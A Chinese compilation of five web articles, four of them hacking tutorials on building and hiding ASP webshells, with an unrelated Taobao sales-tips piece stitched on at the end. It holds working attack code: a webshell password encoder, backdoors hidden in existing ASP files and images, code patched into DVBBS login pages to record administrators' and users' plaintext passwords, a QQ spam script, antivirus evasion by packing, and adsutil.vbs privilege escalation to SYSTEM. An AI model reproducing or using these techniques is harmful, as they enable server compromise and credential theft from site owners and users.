下面是小编为大家收集的教你轻轻松松打造属于自己的ASP木马,本文共5篇,仅供参考,欢迎大家阅读,一起分享。
篇1:教你轻轻松松打造属于自己的ASP木马
这段时间一直在家养病,人快疯了!回黑基随便逛逛,呵呵,发现一篇文章是ASP木马代码的。
看了看,突然想写点什么。也许是上面写的不完整吧。
第一步,修改密码:别人的马跟自己的区别第一个就是密码。
先把修改密码的地方找出来。代码如下:
if Epass(trim(request.form(“password”)))=“qtjckgas3i” then
response.cookies(“password”)=“7758521”
response.redirect rseb & “?q=list.asp”
else %>
重点在(trim(request.form(“password”)))=“qtjckgas3i”有些人以为这就是前一个人的密码。
呵呵,生成一个ASP上传一试。怎样?不行吧。呵呵。密码是加密了的。
第二步,按自己的意愿美化网页。
有人喜欢白色,有人喜欢黑色。象我,我就喜欢网页里有音乐。所以把HTML代码嵌入ASP里。注意如果ASP学得不是很好的
建议最好放在最顶端这样对于整个程序的思路都很清晰,而且不会破坏ASP内部语法。代码可以为:
颜色的修改。
如:COLOR: #000000; Color后面的参数就是颜色对应的参数。如果对参数不是很了解的,可以采用英语:Color:black;前面不加
“#”
当然了,美化可以根据自己的习惯来加,也可以加些特效脚本,不过我一般都只加音乐,多了就太花翘了,呵呵。
第三步,如何将原代码密码修改。
这步应该算第一步的补充吧,之所以放在后面单独说,因为他这里牵涉到一定的技术,也是本篇的精髓。“qtjckgas3i”这是被
加密过了的。是利用一个工具直接生成密码的。什么呢?呵呵,是段ASP代码。这里我给出源码希望大家能够学习一下。
<%
pass=“yourpsw”
temppass=StrReverse(left(pass&“zxcvbnm,./”,10))
templen=len(pass)
mmpassword=“”
for j=1 to 10
mmpassword=mmpassword+chr(asc(mid(temppass,j,1))-templen+int(j*1.1))
next
Epass=replace(mmpassword,“'”,“B”)
%>
<%=Epass%>
将上面的ASP代码COPY到记事本里,然后另存为asp的,传到ASP空间上。打开,呵呵,看到了什么?乱码?没错。这是利用ASP代码
直接导成WIN碎片格式的,假定我们想设置的密码是“hacker”就把他跟pass=“yourpsw”里的“yourpsw”替换,然后生成ASP上传下到
空间,打开,这时候现实的就是我们加密后的密码:q_uxqeledm 这时候把原木马的PSW-“qtjckgas3i”给替换成我们加密后的密码
这样一个个性的ASP木马就出来了。登陆ASP木马时使用没有加密的密码登陆!
大家可以看看这是我简单修改后的ASP木马.
篇2:教你打造ASP木马
这段时间一直在家养病,人快疯了!回黑基随便逛逛,
教你打造ASP木马
,
呵呵,发现一篇文章是ASP木马代码的。 看了看,突然想写点什么。也许是上面写的不完整吧。 第一步,修改密码:别人的马跟自己的区别第一个就是密码。 先把修改密码的地方找出来。代码如下: if Epass(trim(
篇3:教你成为ASP木马高手
1.名称:如何制作图片ASP木马 (可显示图片) 建一个asp文件,内容为 找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为 了运行成功,还要搜索<%和%>
1.名称:如何制作图片ASP木马 (可显示图片)建一个asp文件,内容为
找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为
了运行成功,还要搜索<%和%>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入
先用精锐网吧辅助工具得到用户名和密码,然后用计算机管理联结一台机器,开telnet,连接,开共享, 复制一个木马过去运行即可, 3.名称:感受MD5暴力破解的魅力
rainbowcrack用法先用rtgen生成库 “rtgen md5 byte 1 7 5 2400 40000 all”
1和7代表密码最小和最大长度
阿汀我再加个方法:md5.rednoize.com/ 在线破解
或者到www.md5lookup.com/?category=01-3&;searck=on 4.很多时候我们做免杀木马,不用懂汇编,用北斗加壳程序就能逃杀,还有很多加壳软件,大家木马加壳 的时候最好多选择不知名的加壳软件 5.名称:隐蔽的插入型ASP木马
(1)在我们要做手脚的asp文件里加入如下内容
<%if request(“action”)=“ok” then%>
shell代码插在这里,最好是小马,还要加密一下
<%end if%>
访问的时候在你作手脚的asp文件后面加上?action=ok,即可
(2)另一种方法,在我们要做手脚的asp文件里加入如下内容
<%
on error resume next
strFileName = Request.QueryString(“filer”)
set bjStream = Server.createObject(“ABODB.Stream”)
objStream.Type = 1
objStream.Open
objStream.LoadFromFile strFileName
objStream.SaveToFile Server.mappath(“ating.asp”),2
%>
访问的时候在做手脚的asp文件后面加上?filer=XXX
XXX为你本地上传的一个路径如 c:ating123.asp
上传后在做手脚的asp的同文件夹中有ating,asp
(3)前提得到system权限,
进入网站目录下一层
mkdir s…
copy ating.asp s…/
这样杀毒软件找不到的
访问网站/s…/ating.asp即可 6. 工具hack520.tengyi.cn/chaojiyonghu.rar,此工具在该电脑生成一个超级用户 用户名为: hack 密码110,在DOS下和计算机管理器上看不到你建立的用户,并且是删除不掉的 7.名称:QQ群脚本攻击
打开qq对话诓,复制消息,然后
下面的内容保存为.vbs 文件,运行即可
Set WshShell= WScript.createobject(“WScript.Shell”)
WshShell.AppActivate “QQ信息攻击脚本”
for i=1 to 20
WScript.Sleep 1000
WshShell.SendKeys“^v”
WshShell.SendKeys i
WshShell.SendKeys “%s”
Next 8.搜索:程序制作:万鹏 有免费申请空间的,直接上传asp马即可 9. 名称:全面找出你站上的ASP木马
(1) 用杀毒软件
(2) 用FTP客户端软件,点“工具”->“比较文件夹”
(3) 用asplist2.0.asp上传到站点空间查看,一般功能多的ASP我估计就是ASP木马
(4) 用工具Beyond Compare 10名称:拓展思路拿DVBBS帐号 “一个人的圣经”的动画
(1)以前获得webshell后想进入DVBBS的后台,想要管理员的密码,可以这样
老办法:
修改admin_login.asp得到明文DVBBS后台密码
在“username=trim(replace(request(”username“)这行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.createObject(”Scripting.FileSystemObject“)
set tsObject = fsoObject.createTextFile(Server.MapPath(”laner.txt“))
tsObject.Write CStr(request(”password“))
Set fsoObject = Nothing
Set tsObject = Nothing
只要管理员登陆后台,在目录下就生成了laner.txt
(2)login.asp中Case ”login_chk“下:
on error resume next
Dim rain
set rain=server.createobject(”adodb.stream“)
rain.Type=2
rain.CharSet=”gb2312“
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath(”laner.asp“)
rain.writetext now&request(”username“)&”text:“&request(”password“)&chr(10)
rain.SaveToFile server.MapPath(”laner.asp“),2
rain.Close
set rain=nothing
这样laner.asp将获得全部登陆人的登陆时间,用户名和密码
(3)如果你有自己的网站或者另外的webshell(强烈建议使用):
可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp:
<%if request(”n“)”“ and request(”p“)”“ then
on error resume next
Dim rain
set rain=server.createobject(”adodb.stream“)
rain.Type=2
rain.CharSet=”gb2312“
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath(”laner.asp“)
rain.writetext now&”Name:“&request(”n“)&”Password:“&request(”p“)&chr(10)
rain.SaveToFile server.MapPath(”laner.asp“),2
rain.Close
set rain=nothing
end if%>
篇4:教你提升asp木马权限
网络上传统的提升asp权限为系统的有两种:
1.图形化下的,把默认站点---->主目录--->应用程序保护设置为低,这样就可以把asp权限设置为system.
但这种提升方法很容易被发现,所以网络有另一种一般是用adsutil.vbs来提升权限.而这个也是今天
我要谈的关于adsutil.vbs提升权限.
2.用adsutil.vbs搞定.
在网络上我看到了很多的教你用这种方法的动画,文章,但我至今没有看到一篇介绍原理的,下面我谈谈我个人的看法:
先举个例子:
有一群狗,这群狗里有几个长老级狗物,它们拥有着至高无上的权限,而其它的狗,他们的权限则少得可怜.
转到计算机上:
在IIS中,有几个Dll文件是拥有特权限的,我们可以理解为系统权限,就像长老级的狗.而解析asp的asp.dll则就像一只
普通的狗,他的权限少得可怜.
那 么,如果asp.dll也成了长老级的狗的话,那么asp不也就有了系统权限了吗,这是可以成立的.所以我们的思路也就是
把asp.dll加入特权的dll一族之中.提升步骤为:
<1>先查看有特权一话有哪些.
<2>加asp.dll加入特权一族
好了,下面我们就来实践这个过程.
1 )查看有特权的dll文件:
命令为:cscript. adsutil.vbs get /W3SVC/InProcessIsapiApps
得到显示为:
C:InetpubAdminScripts>cscript. adsutil.vbs get /W3SVC/InProcessIsapiApps
Microsoft (R) Windows 脚本宿主版本 5.1 for Windows
版权所有(C) Microsoft Corporation -. All rights reserved.
InProcessIsapiApps : (LIST) (5 Items)
”C:WINNTsystem32idq.dll“
”C:WINNTsystem32inetsrvhttpext.dll“
”C:WINNTsystem32inetsrvhttpodbc.dll“
”C:WINNTsystem32inetsrvssinc.dll“
”C:WINNTsystem32msw3prt.dll“
看到没有,他说明的是有特权限一族为:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
这几个文件,不同的机子,可能会不同.
2)把asp.dll加入特权一族:
因为asp.dll是放在c:winntsystem32inetsrvasp.dll (不同的机子放的位置不一定相同)
我 们现在加进去cscript. adsutil.vbs set /W3SVC/InProcessIsapiApps ”C:WINNTsystem32idq.dll“ ”C:WINNTsystem32inetsrvhttpext.dll“ ”C:WINNTsystem32inetsrvhttpodbc.dll“ ”C:WINNTsystem32inetsrvssinc.dll“ ”C:WINNTsystem32msw3prt.dll“”c:winntsystem32inetsrvasp.dll“
好了,现在你可以用cscript. adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进
了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到C:InetpubAdminScripts>这个目录下.
那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.
例:cscript. adsutil.vbs set /W3SVC/InProcessIsapiApps ”C:WINNTsystem32idq.dll“ ”C:WINNTsystem32inetsrvhttpext.dll“ ”C:WINNTsystem32inetsrvhttpodbc.dll“ ”C:WINNTsystem32inetsrvssinc.dll“ ”C:WINNTsystem32msw3prt.dll"
这样就可以了,当你再用cscript. adsutil.vbs get /W3SVC/InProcessIsapiApps 这个语句查之时,如果没有看见asp.dll,
说明,asp的权限又恢复到以前的权限.
待续.....先去上课.
篇5:教你如何打造属于自己的人气宝贝
人气宝贝对店铺的贡献是非常大的,他能为店铺带来稳定的流量,也能够稳定提高店铺的销量、成交量、好评数量、好评率等等。由此可见,打造出属于自己店铺的人气宝贝是多么的迫在眉睫。那么,人气宝贝应该如何来打造呢?
1、新品上架之初要保证价格低于同类,前期可以不为赚钱。和同类产品相比,只要质量可靠并且价格低,那怕是新上架的宝贝,销量也不用愁了,因为中国的消费者大部分还是很看重价格的,只要具有了价格优势,销量也就被带起来了,
2、借助直通车、聚划算等淘宝营销工具来带动销量。借助淘宝营销工具来带动销量的效果还是不错的,有时候一场聚划算下来能带动几百件销量,那就相当可观了,呵呵。
3、销量提升的同时,售后服务一定要跟上。人气宝贝的另一个决定因素就是宝贝的动态评分和好评数量。销量很多,但是顾客普遍评价打分很低,也不会被淘宝推荐为人气宝贝的。
4、随着销量和好评数量的逐渐增多,将会带来更多的成交量,可以说只要做好价格、产品、售后,并且宝贝已经有了一定的销量和口碑,这个良性循环就形成了,人气宝贝打造成功。
文档为doc格式
